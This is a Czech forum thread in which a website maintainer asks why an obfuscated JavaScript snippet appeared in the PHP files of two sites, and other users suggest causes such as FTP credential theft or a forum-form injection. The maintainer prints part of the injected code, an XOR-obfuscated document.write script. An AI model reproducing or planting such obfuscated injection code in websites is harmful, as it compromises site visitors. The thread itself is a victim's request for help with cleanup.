» Poradna » Počítačové sítě

Vir? měnící webové stránky

 |   | 

Dobrý den,

dneska ráno mě nemile překvapila následující věc. Na dvou webech, které občas pomáhám udržovat, byly nepochopitelné chyby. Nevěděl jsem proč, ale následně jsem v HTML kódu (v PHP skriptech) obou z nich objevil následující kód:




Nechápu, jak se tam dostal. V zálohách jsem nic takového neměl, takže oprava byla rychlá, ale děsí mě, že nevím, čím se to stalo. Předpokládám, že chyba bude někde u mě, protože oba dva weby běží na hostingu jiné firmy, takže nepředpokládám, že by se někdo naboural přímo do serverů.

Spíše teda předpokládám, že mám v pc něco, co dokázalo ty skripty změnit prostřednictvím FTP. Nenapadá mě totiž ani nikdo jiný, kdo by kromě mě mohl mít FTP přístup k oběma serverům....

Zkoušel jsem se dívat různě po netu, jestli nenarazím na podobný problém. Našel jsem něco zde: www.webhostingtalk.com ... ale bohužel tam si nikdo nevěděl rady.

Tak se chci zeptat, jestli někdo netušíte, co to může způsobovat? Nebo jestli nevíte, kde bych našel nějaké informace?

Odpovědi na otázku

 |   | 

Koukám, že se mi tady ten kód nevložil, snad to teď dopadne lépe:

<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28hzK
.... nepíšu sem celý kód, má přes 4kB ....
h%28JYi%29%7B%7D%7Dvar%20hzK%3D1%3C/script%3E"))</script><!--[/z0s]-->

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Neni to nejaka reklama hostingove firmy?

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Tak to nevím, ten skript negeneruje nic viditelného, žádnou reklamu, takže nepředpokládám.

Projel jsem ten kód a vypreparoval z něho toto:

<script>
if(hzK!=1){
function RC(Ef){
return Ef
}
try{
var WD='',Om=WD.substr(2,1);
var ve=Array(dm('187'),7639^7459,dm('228'),3092^3297,29669^29451, dm('247'),dm('243'),dm('185'),23196^23165,22421^22375,5280^5193,dm('232'), 2236^2075,dm('200'),32672^32607,13646^13793,23352^23539,28825^28751, 27546^27441,dm('202'),28885^28729,dm('174'),27683^27871,3948^3997,dm('230'), 15922^16109,14355^14579,16239^16287,16495^16597,dm('226'),dm('195'), 17002^17025,12038^12235,401^301,dm('169'),2458^2377,dm('234'),dm('172'), dm('191'),15898^16043,16248^16331,13830^14001,dm('227'),dm('165'),dm('192'), 12483^12311,19335^19325,dm('215'),18213^18309,dm('182'),dm('221'),6932^7121, 30473^30671,11947^11881,dm('168'),dm('239'),15585^15435,27460^27641, 29683^29525,20303^20471,11427^11391,dm('217'),23676^23681,7883^7797, dm('218'),dm('219'),19761^19919,5026^4935,24503^24323,18986^19103, 13127^13187,dm('141'),8024^8077,19423^19309,dm('176'),8318^8375, 5604^5385,dm('173')),Ho;
var xu,nW;
var yC='',Qx='';
WD=WD.split(Om);
for (Ho=0;Ho<yC.length;Ho+=2){
nW=yC.substr(Ho,2);
for(xu=0;xu<WD.length;xu++){
if(WD[xu]==nW) break;
}
Qx+=String.fromCharCode(ve[xu]^135);
}

function dm(OB){
return parseInt(OB)
}
document.write(Qx);
}
catch(MH){}
}
var hzK=1
</script>

akorát moc mi to teda neříká, co by to jako mělo dělat...

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Neco k tomu je tady: navody.c4.cz ...

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

jop dnes sa mi stalo presne to iste .. heslo na ftp som mal 39 znakove zlozene z vsetkych moznych znakov ale napriek tomu sa tam ten kod nejako dostal

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Mal som niečo podobné, obnovil som web zo zálohy ale u všetkých súborov som zmenil atribút len na čítanie a pomohlo to.

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

Zdravím. Asi 3 dny se k tomu nemohu dostat, ale dnes už mne to přinutilo podívat se na ten virusek.. Mám to taky na svých stránkách a odhaduji, že se to tam dostalo přes formulář v diskusním foru. Krátkou dobu se tam někomu daří vkládat nesmyslné odkazy a jsem si jistý, že tímhle se to tam podařilo vpravit až na server do php souborů. Nic, jdu studovat internet, kdyžtak se ještě ozvu, co teda s tím.

Souhlasím  |  Nesouhlasím  |  Odpovědět
 |   | 

docela super antivirak a zadara zkoušel jsem ho mužu jen doporučit www.sosej.cz ...

Souhlasím  |  Nesouhlasím  |  Odpovědět



Určitě si přečtěte


Aktuální číslo časopisu Computer

Jak rychlé je nabíjení bez drátů?

Test 11 sluchátek pro hráče

Aplikace, které vám zachrání dovolenou

Kompletní přehled datových tarifů